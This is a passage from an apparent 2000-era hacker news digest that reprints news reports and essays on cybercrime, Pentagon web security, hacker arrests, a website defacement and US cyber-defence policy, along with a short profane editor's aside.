the lack of online security awareness within the Department of Defense."
In the aftermath of Gomez's alleged security violations, Forno and others
now are calling for the Pentagon to take further steps to establish what
should not be revealed by military members on non-military Web sites.
"The Pentagon has not kept up with the Internet, despite being its parent.
And yes, the Internet should be subject to OPSEC regulations, just as
phones, radios, and message traffic is," said Ed Markin, a retired Navy
pilot."Odds are the vast majority of senior military officers have no
concept of what all transpires on the Internet."
Susan Hansen, Pentagon spokeswoman, countered that the Pentagon already
has taken steps to caution military members on use of the Web.
"The current [OPSEC] directive was updated and signed out by Deputy
Secretary John Hamre on Nov. 29. It does include a specific reference to
the World Wide Web by stating that 'the Department of Defense maintains
heightened awareness of potential threats of adversaries taking advantage
of publicly available information and other detectable unclassified
activities to derive indicators of U.S. intentions, capabilities,
operations and activities'," Hansen said.
The Navy's public affairs office did not respond by press time to a
request for comment.
ISN is sponsored by Security-Focus.COM
@HWA
223.0 ISN:Police to step up fight against e-crime
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Police to step up fight against e-crime
Source: AAP | Published: Friday March 17, 3:38 PM
Police are set to recruit computer boffins in a bid to boost the fight
against so-called e-crime.
The potential to commit crimes using computers and other information
technology was one of the greatest problems ever to face law
enforcement, Australian Federal Police Commissioner Mick Palmer said
today.
Speaking at the end of a week-long conference of police commissioners
from Australia, New Zealand, Fiji and Papua New Guinea, Commissioner
Palmer said a staggering 900 million people would be using the Internet
by the end of this year.
'People who abuse these technologies have the capacity to commit
offences on a global basis, with complete anonymity, with speed and on a
scale not previously encountered,' Commissioner Palmer told journalists.
Credit card fraud, electronic vandalism, terrorism, electronic money
laundering and tax evasion are some examples of electronic crime.
'The capacity of properly organised, electronic based crime to undermine
the financial stability of small and medium sized countries is very
real,' Commissioner Palmer said.
A major problem for police is how to attract personnel with enough
technical expertise to fight this new crime.
Commissioner Palmer said already police recruitment and selection was
becoming more flexible.
'Clearly some of the technical skills that we are going to need ... come
at a very high cost,' he said.
'People ... in that industry are earning a lot of money and that makes
the partnerships with business and the wider business community very
important.'
Police will be looking to exchange staff with private industry to gain
the skills necessary, probably on short term, project based
arrangements.
Commissioner Palmer said discussions and negotiations had already begun
on this issue and Commonwealth Bank CEO David Murray addressed the
commissioners.
'We will be recruiting people from the coalface for short periods of
time, we are going to be sharing resources between ourselves and the
wider partnership both in the private and public sense.'
The commissioners agreed to establish an Electronic Crime Steering
Committee to evaluate Australasia's capacity to fight electronic crime.
It will develop an Australasian Law Enforcement Electronic Crime
Strategy by the end of June.
@HWA
223.0 W00T:You already read section 223.0 you dumb ass.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Fucking huge issue this isn't it? wtf am I nuts!?! noone even reads
this thing <sic>
Yeah its a hidden track. wow....we're possibly going to be affiliated
with EUA coz like they're cool and shiznitz and besides _jeezus_ told
me to.
Also the IBT people may be dragging my sorry ass into their fold, but
we'll see... I have some issues there.
Lessee, oh yeah i'm in b0f now, why? vanity of course. besides I passed
the brainbench lame internet security cert exam (lol/phear).
Military box has been probing my windows machine (one I surf and mail
from) ds-1.chamb.disa.mil, I couldn't connect back it gave me a net
unreach error so I guess its firewalled. If you're reading this, you
guys should just join #EFnet IRC and /join #hwa.hax0r.news and chat.
Don't probe my fucking box or i'll bite back. seen? you're not even
my country's military, keep yer nose out and stop fucking strongarming
the milmail people. assholes. I know who you are.
To the guy that mailed me trying to get on the mailing list with "adept"
in your name... first you mailed a trap email address, where did you
find that one? second yeah i'm the same guy thats in #feed-the-goats
what of it? who are you? :-))
End of hidden track.
Cruci-
(C*:.)
224.0 ISN:Developers blasted on security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: William Knowles <wk@c4i.org>
http://www.wired.com/news/politics/0,1283,34865,00.html
WASHINGTON -- A top cyber security expert blasted software developers
Thursday for marketing flawed products that he said boosted the Internet's
vulnerability to hacker attacks.
"There is little evidence of improvement in the security features of most
products," said Rich Pethia, director of a federally funded computer
emergency response operation at Carnegie Mellon University in Pittsburgh.
"Developers are not devoting sufficient effort to apply lessons learned
about the sources of vulnerabilities."
Pethia made his comments to a congressional panel looking into the
so-called denial-of-service attacks that disrupted access to popular Web
sites last month for a few hours at a time.
He said his organization, which responded to more than 8,000 computer
security incidents last year, up from 132 in its first full year of
operation 10 years ago, had found the same types of security defects in
newer versions of products as in earlier ones.
"Technology evolves so rapidly that vendors concentrate on time to market,
often minimizing that time by placing a low priority on security
features," he said in a statement to a subcommittee of the House Committee
on Government Reform.
The alleged lack of urgency in plugging such cracks is unlikely to change
until customers demand that products that are more secure, Pethia said.
Pethia did not criticize any companies by name in his prepared statement
to the panel.
ISN is sponsored by Security-Focus.COM
@HWA
225.0 ISN:"Islands in the clickstream, in defense of hacking"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: richard@thiemeworks.com
The following article was published in the Village Voice, February 16 - 22, 2000
and the LA Weekly under the title "Hacking the Future."
Islands in the Clickstream:
In Defense of Hacking
Let's get our definitions straight. Last week's attacks on dozens of Web
sites were not the work of hackers. They were the work of script kiddies,
and the difference is everything. Script kiddies download ready-made tools
and use them to damage the network. Script kiddies criminally distort the
essential ethos of hacking, which is to pass through the network without a
trace. Hackers read the unknown, sense the contours of the codes that make
tomorrow's booms and busts.
It's no wonder that last week hackers everywhere cringed when the media
confused them with script kiddies. Not less than 10 years ago, the word
hacker conjured a dedicated geek, hunched over a glowing terminal, working
late into the night to solve an intractable dilemma. Now hacker means
something akin to cybercriminal. The semantic shift is regrettable, not
only because the distortion inhibits clarity, but because it buries a
piece of history we'd be wise to keep fresh: It was hackers who cobbled
together the Internet.
Hacking is a quest for knowledge. You can see the essence of the activity
in meetings at security firms like Secure Computing, where hackers are a
key part of the professional services team. With clients in the Fortune
500 and three-letter government agencies, like DOD and NSA, the stakes are
high, and when the firm faces a perplexing problem, brainstorming sessions
go late into the night. Ideas fly from one person to another like pinballs
off flippers, as the group mind turns over and examines the puzzle from
all sides.
The concept of a "group mind" flows from the structure of the Internet
itself, parallel processor harnessed to parallel processor to achieve a
single goal. It's no coincidence that information technology professionals
often think in a style similar to the way computers calculate. The network
taught them how to reason digitally; it imprinted itself on their minds
just as they imprinted their minds on it.
Is it any wonder, then, that hackers are the leaders of the new
millennium? By leader I mean someone who forges ahead and names the
emergent realities of the dim future. Consider Tim Berners-Lee, who
designed the first Web protocols and wrote the first browser code.
Berners-Lee was a hacker. Or consider Richard Stallman, the evangelist of
Open Source software. Stallman is an extraordinary hacker.
I recently consulted with a major mutual fund, and after the meeting I
traded war stories with its head of IT. He fondly recalled the old days of
hacking Unix systems. That this former "delinquent" now runs a system
executing billion-dollar transactions is not shocking. Most of the bright
people in the IT business learned how to hack by-what else?-hacking.
Let's go back to Open Source for a moment. It's now the conventional
wisdom that the Linux operating system and GNU Project are miracles of
modern computing, which may one day triumph over the clunky software
produced by the Microsoft-Apple cartel. Stallman launched the GNU Project
by asking hackers to volunteer their services. Of course, they did.
Likewise, Linux was founded on the belief that complex systems must be
open, evolving, and free in order to reach their ull potential. In other
words, they must be hackable and they must be hacked. Continuously.
Now comes the FBI and President Clinton with criminal sanctions for these
script kiddies. It's right and just to keep the peace, but let's remember
that in the Internet's embryonic stage, hacking, far from being criminal,
was encouraged. When computers were first networked through telephone
lines and slow modems, bulletin boards emerged as crossroads where
cybertravelers could leave messages and valuable information about how the
phone lines intersected with microprocessors. By these postings, the
network formed a symbiotic relationship with its users, and through the
give and take of countless exchanges between hackers, the network
bootstrapped itself to a higher level of complexity. As Tom Jackiewicz,
who helps administer upt.org, an outgrowth of the hackers' favorite, the
UPT Bulletin Board, recalls, "In the old days of a decade ago, no kid
could afford a Solaris workstation. The only machines available were
online. You could learn only by roaming the network."
Today the stakes are higher, security tighter, but the basic modalities of
hacking and its relationship to innovation remain. The challenge du jour
is the gauntlet thrown down by Microsoft, which claims that Windows NT,
the operating system of many businesses, is secure. What a claim! For a
baseball fan it would be like hearing the Yankees brag that they could
play an entire season without losing a single game. Hackers love to find
flaws in Windows NT. For them, the payoff is the power rush of the thunk!
when the stone hits Goliath in the forehead.
One of the sharpest stones to leave a hacker's sling is a program called
Back Orifice 2000. Developed by a group called Cult of the Dead Cow, the
program can be loaded stealthily on a Windows network, giving a remote
user control over the network. Why develop such a weapon? In the current
environment of ubiquitous distributed computing-that is, networks and
nodes everywhere-the hackers argue that no operating system protects
against stealthy executables like Back Orifice. So the program is a form
of shock therapy. It jerks Microsoft into action, stirring an indolent
industry into making the Internet more secure. The upgrades that come as a
result benefit every Windows user.
As a culture we are just beginning to recognize this dynamic. One of the
first hacker groups to benefit from our grudging acceptance of the craft
is LOpht, which crossed over from the computing underground to the
mainstream after finding flaws in Windows NT. Their transition has been so
successful that when Congress conducted an investigation into Internet
security it asked two LOpht members, Mudge and Weld Pond, to come to
Washington for a briefing. Now LOpht has teamed up with former Compaq
Computer executives to form @Stake, a security firm that has the media and
Wall Street swooning.
So when is a hacker not a felon? When he receives $10 million in venture
capital? When Congress invites him to a hearing?
When we lump all hackers into a criminal class we are liable to forget
their essential role as architects of the information age. Edward O.
Wilson said that scientists are characterized by a passion for knowledge,
obsession, and daring. Hackers share that passion, the hunter-gatherer
gene for restless wandering, wondering what's beyond the next hill. They
hack because it's fun, because it's a challenge, and because the activity
shapes their identity. Their strengths-love of risk, toleration of
ambiguity, and ability to sift meaning from disparate sources-power the
very network we all rush to join.
**********************************************************************
Islands in the Clickstream is an intermittent column written by
Richard Thieme exploring social and cultural dimensions
of computer technology and the ultimate concerns of our lives.
Comments are welcome.
Feel free to pass along columns for personal use, retaining this
signature file. If interested in (1) publishing columns
online or in print, (2) giving a free subscription as a gift, or
(3) distributing Islands to employees or over a network,
email for details.
To subscribe to Islands in the Clickstream, send email to
rthieme@thiemeworks.com with the words "subscribe islands" in the
body of the message. To unsubscribe, email with "unsubscribe
islands" in the body of the message.
Richard Thieme is a professional speaker, consultant, and writer
focused on the impact of computer technology on individuals and
organizations - the human dimensions of technology and work - and
"life on the edge."
Islands in the Clickstream (c) Richard Thieme, 2000. All rights reserved.
ThiemeWorks on the Web: http://www.thiemeworks.com and
http://www.richardthieme.com
ThiemeWorks P. O. Box 170737 Milwaukee WI 53217-8061 414.351.2321
*********************************************************************
ISN is sponsored by Security-Focus.COM
@HWA
226.0 ISN:Man angry at employer swallows own head.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.sjmercury.com/breaking/docs/073358.htm
NEW YORK (AP) [03.15.2000] - A database engineer angry at his employer
was arrested on charges of using codes to disable computers in a
three-day cyber attack on the company, authorities said Wednesday.
Abdelkader Smires, 31, was arrested Tuesday and charged with
intentionally causing damage through the unauthorized use of a
computer.
Computers at Internet Trading Technologies crashed for several hours
over the three-day period beginning March 9. The attacks were traced
to a computer at Queens College and authorities determined that
Smires, who had once taught computer science there, had been using
that computer, according to a criminal complaint.
The company processes trades electronically for members of the
National Association of Securities Dealers.
The alleged attacks began after Smires and another engineer -- who was
not named -- refused to help consultants and other workers learn the
company's new operating system without more money, job security and
equity, authorities said.
On March 8, the company offered Smires a $70,000 raise, $50,000 in
stock options and a one-year contract, but Smires turned them down,
authorities said.
The charge is punishable by up to five years in prison. Smires was in
jail without bail pending a hearing Friday in federal court. He was to
be assigned a public defender. Calls to the public defender's office
were not immediately returned Wednesday.
*-------------------------------------------------*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions http://www.c4i.org
*-------------------------------------------------*
ISN is sponsored by Security-Focus.COM
sniff.
@HWA
227.0 ISN:Nasa division battles the hack from ipanema.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.newsbytes.com/pubNews/00/145708.html
By Robert MacMillan, Newsbytes
WASHINGTON, DC, U.S.A.,
15 Mar 2000, 1:15 PM CST
From Antonio Carlos Jobim to the samba, the US generally has welcomed
some of the cooler cultural exports from Brazil, but the latest one -
a series of hack attacks on NASA's Jet Propulsion Laboratory at
CalTech - has the agency bossa nova-ing its way toward beefing up its
security measures.
JPL Spokesman Frank O'Donnell confirmed for Newsbytes an MSNBC report
that the agency has shut down access to queries emanating from Brazil
until the agency's security team makes some necessary improvements to
its network.
O'Donnell said that the Brazil shutout was not a "blacklist" attempt,
as earlier reports indicated.
"There was a number of recent attacks on JPL hosts originating from
various sites in Brazil, and as a temporary move while our computer
security people work, we're blocking network access to JPL from
Brazil," O'Donnell said. "But this is a temporary thing."
He said normal service to South America's largest nation would return
"in a matter of days at most."
He added that he is "not aware of any (security) compromises per se in
these attacks."
Highly secure data at JPL generally is not stored on hosts that are
connected to the Internet, O'Donnell also said, but added that he
could "not go into a great deal of detail" on what kind of information
was sought.
MSNBC reported the Brazil problem after a network analyst at the Bank
of Brazil in Brasilia reported that he could not access the JPL site.
The service also reported that a CERT official at its headquarters in
Pittsburgh, Pa., said that blocking access to an entire network or
country is reasonably common, though the official said that spoofing
attacks - when the address of the attacking e-mail in a denial of
service attack is falsified - blocking against a particular domain or
country code becomes largely ineffective.
O'Donnell said that CERT and the JPL have been working jointly on
security issues.
*-------------------------------------------------*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions http://www.c4i.org
*-------------------------------------------------*
ISN is sponsored by Security-Focus.COM
@HWA
228.0 ISN:Toys'R'Us
~~~~~~~~~~~~~
http://www.washingtonpost.com/cgi-bin/gx.cgi/AppLogic+FTContentServer?pagename=wpni/print&articleid=A52710-2000Mar10
Toys 'R' U.S.
By William M. Arkin
Special to washingtonpost.com
Monday , March 13, 2000
The Navy's announcement that it is arming 2,000 ship-based officers
with Palm V computers would seem, at first glance, to be a sound
business decision, and proof that the Pentagon can indeed buy "off the
shelf" products to the benefit of the taxpayer.
The purchase is touted as the largest government buy ever of hand-held
devices. But is it an investment in productivity, or a faddish move
that has no place in the military arena?
"It's one of the neatest things I've ever seen," Lt. Jeff Keenan told
the Associated Press. Keenan is a combat systems officer aboard the
Norfolk-based destroyer USS Laboon. "I used to be one of those people
who carried around a big date book all the time, and I'd misplace it
plenty of times, particularly when you'd put it down to climb a
ladder," Keenan said.
Don't burn your notebook just yet Jeff.
Though his Palm V packs the equivalent of message center,
walkie-talkie and clipboard, you can't get it wet.
Plug and Play
Laptop computers, pagers, and hand-held devices are sprouting like
weeds in the military. While many are truly purchases direct from
civilian vendors, others are made to order for the wear and tear of
the battlefield: waterproof, mud-proof, shock-resistant, anti-glare,
and electromagnetic pulse surviving.
These computers--Mini-Python, the M-30, Condor, FALCon, and Warlord
Notebook--could almost be weapons given their ingenious names. Better
able to survive the rigors of combat, they are much more expensive
than both the Palm V or any high-end commercial laptop.
"A Palm Pilot is five ounces of dead weight in a firefight," says one
military technology expert. For the battlefield, the Army's Force XXI
experiment is testing dozens of laptops and helmet and body-mounted
computers (called "appliques") to link soldiers, officers, and
equipment.
The Navy is not without its own sea-going technology. One company has
produced a $30,000 laptop approved for use on the decks of ships
because it can sustain sea spray, intense sunlight and the extreme
electromagnetic interference from shipboard radar.
Is this indeed "a battlefield bristling with leap-ahead technology,"
as former Secretary of Defense William Perry described the Army's
digitization effort a few years back? Or is it the cyber equivalent of
the $600 toilet seat?
Solutions and Problems
"Adolescence," is how Martin Libicki, an information technology expert
at the Rand Corporation calls the current state of electronic
offerings. Libicki sees a technology harvest that will eventually reap
true military benefits, but for now, he says: "If you are going to be
an adult, you've got to go through it, zits and all."
Libicki has been worrying about ways to ensure that if soldiers are
ever captured with their gizmos, systems will not be compromised. "I'm
worried about the guy who finds himself on the wrong side of an
AK-47," he says. If the enemy were to gain access to the American
tactical picture through a hand-held device or laptop, they could
learn gaps in intelligence and "blue" (i.e., U.S. military)
vulnerabilities.
Thus Libicki has developed some ideas to ensure network security for
the inherently vulnerable battlefield systems. There is his "GPS
lock-out" idea, a $200 module could be added to hand-held devices to
incorporate a global positioning satellite system. If the device is
reported behind enemy lines, the module assumes it has been captured
and shuts down the device down awaiting resynchronization.
Then there is "dual password," which would allow a prisoner of war to
key in a fake password to unlock his laptop for enemy interrogators.
But the back-up password would bring up false data on the screen that
would seem plausible. It would also send a signal to the mother ship
that the unit has been lost. Libicki has even conceived of an
artificial intelligence program that could monitor keystrokes and thus
stress to determine that a machine is still functioning under normal
circumstances.
Adding without a Calculator
Though Libicki is palpably excited by his engineering challenges, he
also asks some pointed questions. Does any soldier who has the
potential to be captured really need a laptop? In a world where you
can see the enemy from far away, do soldiers even need to close in on
the enemy? Are we just building the systems for "a high-tech
Gettysburg," Libicki asks?
"The only time you want to get in and amongst the enemy is when there
is no choice," he says.
Laptop computers that can survive a nuclear war? Notebooks that can
operate on the front lines? Hand-held devices on enclosed ships and
submarines? Obviously there is potential for excess here.
Beyond the question of waste though, there is the matter of
practicality. Proliferation of personal devices ensure better
communication, record keeping, and access to information. But when
systems fail, will military people still know the skills to use the
old grease pencil? I for one have been writing with a word processor
for almost 20 years, and frankly I've lost my ability to write
anything beyond a grocery list in long hand.
Isn't war too important to be left to the laptop?
Contact William M. Arkin at william_arkin@washingtonpost.com
*-------------------------------------------------*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions http://www.c4i.org
*-------------------------------------------------*
ISN is sponsored by Security-Focus.COM
@HWA
"Why is a mouse when it spins?" - Dr Who
229.0 ISN:Computer expert accused of hacking
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: darek.milewski@pl.pwcglobal.com
FBI Computer Expert Accused of Hacking
Henry K. Lee, Chronicle Staff Writer
Friday, March 24, 2000
�2000 San Francisco Chronicle
URL:
http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/03/2
4/MN57003.DTL
Max Ray Butler seemed to be at the top of his game. For two years, the
computer expert was a confidential source for an elite FBI computer crime
squad, helping to ferret out scofflaws on the Internet.
Butler, also known as Max Vision, was also a self-described ``ethical
hacker'' from the Silicon Valley who boasted that he could test the
security of any computer system by penetrating it.
But Butler's cyber activity went too far, federal authorities say.
Butler, 27, of Berkeley appeared in federal court in San Jose yesterday on
a 15-count federal indictment charging him with hacking into computers
used by the University of California at Berkeley, national laboratories,
federal departments, air force bases across the country and a NASA flight
center.
Butler posted $50,000 cash bail yesterday after U.S. Magistrate Judge
Patricia Turnbull ordered him not to use computers except for work. Butler
and his attorney, Jennifer Granick of San Francisco, could not be reached
for comment.
The indictment, handed down March 15, said Butler caused ``reckless
damage'' as a result of intrusions in May 1998. Butler was also charged
with possession, with intent to defraud, of 477 passwords belonging to
customers of a Santa Clara- based Internet service provider.
The case underscores the potential risks involved when law-enforcement
agencies use confidential informants with access to sensitive information.
``Sources are often very close to criminal activity, and sometimes they
cross the line,'' said Special Agent George Grotz, an FBI spokesman in San
Francisco.
Grotz declined to say how Butler became an FBI informant and whether he
was a federal source at the time of the alleged crimes. Grotz said Butler
is no longer associated with the agency.
Friends of the suspect told the Associated Press that Butler was caught
possibly violating the law several years ago and began working with the
FBI to avoid charges. Seth Alves, 27, told the news agency that Butler was
unfairly targeted after refusing to comply with an FBI request.
A 22-month investigation by the FBI and military investigators ended
Tuesday morning when federal agents converged on a home on Dwight Way near
the UC Berkeley campus, where Butler lives with his his 23-year-old wife,
Kimi Winters. No one answered the door. Butler turned himself in to the
FBI in Oakland later that day.
Butler grew up in Idaho and lived with his family in Washington, where
authorities said he has a 1997 misdemeanor conviction for attempted
trafficking of stolen property.
He developed a proficiency with computers, eventually attracting the
attention of the FBI's Computer Crime Squad, which used him as a
confidential informant.
An FBI search warrant affidavit said Butler was ``well known'' to squad
members and ``has provided useful and timely information on computer
crimes in the past.''
In 1997, Butler started a company known as Max Vision in Mountain View,
specializing in ``penetration testing'' and ``ethical hacking'' procedures
in which he would simulate for clients how a hacker would penetrate their
computer systems, according to the company Web site.
``Our client penetration rate is currently 100 percent,'' the site said,
with recent clients including a large consortium of telecommunications
companies, a major motion picture company and an e-commerce online auction
service.
By 1998, Butler was living with Winters in a one-story San Jose apartment,
where the couple started up their own Web-design company, Kimi Networks,
records show. Reached by telephone yesterday, Winters hung up on a
Chronicle reporter.
It was also from that apartment, according to the FBI, that Butler hacked
into computers by using a computer software vulnerability known as a
buffer overflow, which sends commands into a system that ordinarily would
not be allowed.
Butler also allegedly invaded computers used by the Lawrence Berkeley
National Laboratory. Vern Paxson, a computer scientist at the lab, noticed
an online intruder conducting unauthorized scans of laboratory and UC
Berkeley computers in May 1998 and used a monitoring device that later
helped identify the source of the intrusions.
Paxson said yesterday that Butler's arrest was ``somewhat ironic'' but
``not totally surprising.''
Paxson said a person later identified as Butler even sent him an
apologetic e-mail a day after the computer intrusions. Butler also somehow
obtained a confidential incident report Paxton had filed about the
invasions, Paxson said.
ISN is sponsored by Security-Focus.COM
@HWA
230.0 ISN:Disney and Miramax Sued for 'Hacking'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: Nelson Murilo <nelson@pangeia.com.br>
[http://biz.yahoo.com/bw/000329/ca_bartko__1.html]
Wednesday March 29, 8:09 am Eastern Time
Company Press Release
Disney and Miramax Sued for 'Hacking'
Parts of 'The Fugitive Game' Allegedly Stolen For New Movie
SAN FRANCISCO--(BUSINESS WIRE)--March 29, 2000--The Walt Disney Company
and its Miramax division have made a computer hacker movie that ``hacked''
the author's book without paying or giving credit to the writer, according
to a lawsuit filed yesterday by Bartko, Zankel, Tarrant & Miller, a law
firm representing best-selling author Jonathan Littman.
Littman's suit alleges that the Disney/Miramax/Dimension Films production
of the movie Takedown, which premiered earlier this month in 29 theatres
in Paris, France, was based in large part on lifted segments of Littman's
book, The Fugitive Game. Littman's book, published in 1996, is based on
the celebrated capture of computer hacker Kevin Mitnick, who was billed at
the time as the world's most notorious and dangerous ``cyberterrorist.''
``Jonathan Littman carefully researched the reality of the computer hacker
underworld,'' said his lawyer Bill Edlund. ``His book articulated and
supported his view that Kevin Mitnick was not the premeditated, greedy and
destructive criminal portrayed by some of the media. Readers and critics
received Littman's The Fugitive Game as a more in-depth presentation and
entertaining expose of the flawed Mitnick prosecution than the overblown,
self-interested media hype.''
The Fugitive Game shows Mitnick to be not a terrorist, but a computer
hacker, in part a misguided victim of a government entrapment effort that
used a sleazy informant to lure Mitnick into hacking. A key element of
Littman's book is his examination of the media hype spurred in New York
Times articles by reporter John Markoff about the Mitnick story.
Littman also questions Markoff's presentation of Tsutomu Shimomura, a
computer security specialist who used hacking techniques similar to
Mitnick's to trace Mitnick to his hideout in North Carolina.
Shimomura and Markoff wrote their version of these events in their book
Takedown, released at the same time as Littman's book. The book is based
on the seven-week pursuit of Mitnick by Shimomura that led to Mitnick's
arrest in February of 1995. The Disney organization purchased the book and
movie rights to Takedown and have now released their movie version, hiring
a cast that included lead actor Skeet Ulrich and screenwriters led by John
Danza.
``The screenwriter could not shape the story told in the book Takedown
into a workable script,'' said Edlund. ``Once the movie project began to
flounder, Danza and other screenwriters lifted most of the first part of
Littman's The Fugitive Game for the storyline and start of the movie
Takedown. Littman's lawsuit is backed by e-mails allegedly sent by Danza.
In the e-mails, the screenwriter admits that it was 'unfortunate' that
Disney did not option the rights to the book The Fugitive Game to make the
movie Takedown. Danza goes on to describe his desire to use Littman's
insider information and parts of Littman's book in order to try and
salvage the movie project.''
The complaint presents a detailed comparison between Littman's book and
the final shooting script for the movie Takedown, allegedly illustrating
repeated and compelling similarities between the two. According to the
allegations, the film Takedown and The Fugitive Game both open with a
scene in a strip club frequented by a government informer who reveals to
Mitnick information about ``SAS'' -- a secret Pacific Bell phone-tapping
system that Mitnick subsequently breaks into and uses.
Littman's lawsuit also contends that various themes and interpretations
from his book that are absent from the book Takedown appear in the movie
version of Takedown, including the government informer and entrapment of
Mitnick, and the pressure on the government to capture Mitnick created by
exaggerated media hype.
Littman seeks to prevent Disney, Miramax and the other defendants from
continuing to violate his copyrights by distributing the movie and to
recover his damages and the wrongful profits that defendants obtained from
the alleged theft of his work. Littman's lawyers say that the
Disney-Miramax plagiarism tainted Littman's work by patching it into their
motion picture.
Because of this, he is also asking for damages that he claims resulted
from opportunities he lost, including the opportunity for involvement with
other movie projects based on The Fugitive Game.
ISN is sponsored by Security-Focus.COM
@HWA
231.0 ISN:Hacker posts own version of Gore's speech online
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This might be the most pheared 'Dilbert Cubicle Gang' we've been
hearing rumours about lately .. watch for them - Ed
http://www.jsonline.com/news/gen/mar00/1muhack29032800.asp
By Stanley A. Miller II
of the Journal Sentinel staff
Last Updated: March 28, 2000
A hacker cracked into Marquette University's Web site early Tuesday,
replacing the school's home page with a false front concerning Al
Gore's speech at the college.
The fake Web page posted false quotes about the vice president's
address to the university Monday, claiming among other things that
Gore said he plans to "rid this country of anyone who might question
my motives, starting with deporting all Christians."
John Hopkins, vice president for communications at Marquette
University, said the school's information technology staff detected
attempts to break into the network Monday morning and disconnected the
college's link to the Internet so they could deal with the attacks.
The school's link was restored around 5 p.m. Monday, and sometime
between then and 1 a.m. Tuesday, a hacker broke in and replaced the
school's Web page. Marquette's Web page was back to normal by around
1:30 a.m. Tuesday.
"Our IT people are working through this and figuring out what
happened," Hopkins said. The fake home page "was up for a relatively
limited period of time, and that time was early in the morning. I
don't think very many people saw it."
Brian Manganello, an FBI special agent, said Marquette officials
contacted them about the attack, but he declined to comment further.
"We were informed that external attempts were made to compromise their
computer networks," he said. "We're investigating the matter."
John Gapinski, chief operating officer for Sun Tzu Security Ltd., a
technology security company in Milwaukee, said that if the hacker got
administrative access to the school's network servers, the college
could develop all kinds of problems.
The computer intruder may have stashed viruses or other malignant
programs for later use on the school's computers, he said.
"It would be prudent for them to audit their
systems," he said. "You can't necessarily trust anything now."
*-------------------------------------------------*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions http://www.c4i.org
*-------------------------------------------------*
ISN is sponsored by Security-Focus.COM
@HWA
232.0 ISN:Bennett leads cyber defense
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MY mother makes me wear these clothes.
http://deseretnews.com/dn/view/0,1249,155013410,00.html?
Utah senator fears U.S. will be attacked by computer hackers
By Lee Davidson
Deseret News Washington correspondent
WASHINGTON Sen. Bob Bennett was appointed Monday to head a new Senate
group designed to be a central clearing house for information on how
to combat cyber-attacks.
That comes after Bennett, R-Utah, said last week that he fears the
next world war will not be fought with tanks and missiles, but by
enemy hackers attacking the nation's computers to crash everything
from the nation's utilities to its banking.
Bennett also headed a similar committee that oversaw combating the
Year 2000 computer glitch. His new Critical Infrastructure Protection
Working Group emerges largely to address threats warned about by the
earlier Y2K committee.
Senate Majority Leader Trent Lott, R-Miss., said he formed the group
and named Bennett to head it because "recent hacker attacks on major
e-commerce and government Web sites demonstrate the importance of
information security."
Bennett said, "The interconnectivity and advanced capabilities of U.S.
computer systems makes the United States more vulnerable to
cyber-attacks than any other nation in the world. Such attacks could
bring the U.S. economy to its knees."
He added, "The CIP Working Group will serve as a central repository
for this information and coordinate efforts to increase national
awareness."
Also appointed to the group were senators who chair regular committees
that share some jurisdiction over the problem including Judiciary
Committee Chairman Orrin Hatch, R-Utah.
Others include senators who chair the Banking, Commerce, Foreign
Relations, Commerce, Energy, Intelligence, Appropriations,
Environmental, Governmental Affairs and Armed Services committees,
plus a few additional senators.
Just last week, Bennett told a symposium on cyber-security that
lessons learned from fighting Y2K problems showed him how vulnerable
America is to an attack via computer hacking.
"The most vulnerable country in the world to this kind of attack is
the United States of America because we have the most advanced
capabilities," he said.
Bennett added that because computer systems are now so interconnected,
"a cyber-attack one place can bring down services in all the other
places in the world."
He said the major threat would be if "a possible major state . . .
would develop the resources for a concentrated, continuing and
sophisticated attack over time" via computer hacking.
Bennett added, "In my opinion, the next war will be this target rather
than the traditional" weapons of war.
*-------------------------------------------------*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions http://www.c4i.org
*-------------------------------------------------*
ISN is sponsored by Security-Focus.COM
@HWA
233.0 ISN:Hackers rue blurred line between curiosity, vandalism
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I didn't write it folks, dictionaries are cheap these days
aren't they? - Ed
http://www.techserver.com/noframes/story/0,2294,500185952-500248285-501250243-0,00.html
By HARRY BRUINIUS, The Christian Science Monitor
NEW YORK (March 28, 2000 2:20 a.m. EST http://www.nandotimes.com) -
When Simple Nomad was younger, one of his favorite pastimes was
worming his way into phone companies' computer systems. That was more
than 10 years ago, before words like "Internet" and "hacker" were key
words in the cultural lexicon - and before it was against the law.
"I liked to take things apart and see how they worked, he says. "In
that way, I'm considered 'old school.'"
Getting around a computer system's security and exploring its
technological nuance is part of the thrill of the pseudonymous world
of the hacker underground, a relatively young cyberspace culture where
computer programmers like Simple Nomad are driven to demonstrate their
own technological skills.
For many, the term "hacker" conjures up images of a precocious
troublemaker smirking as he toys with the technologically challenged.
Indeed, sometimes what the hacker underground sees as exploring,
companies call trespassing.
But hackers see a difference between their love of exploration and
computer showmanship and recent attempts to shut down Web sites and
steal credit-card information. They see themselves as pioneers, ones
who are helping computer culture and science evolve - as opposed to
the thieving (and amateur) tactics of those they derisively call
"crackers."
But as the Internet evolves into a giant superstore, the lines between
black and white are blurring further. The hacking underground has a
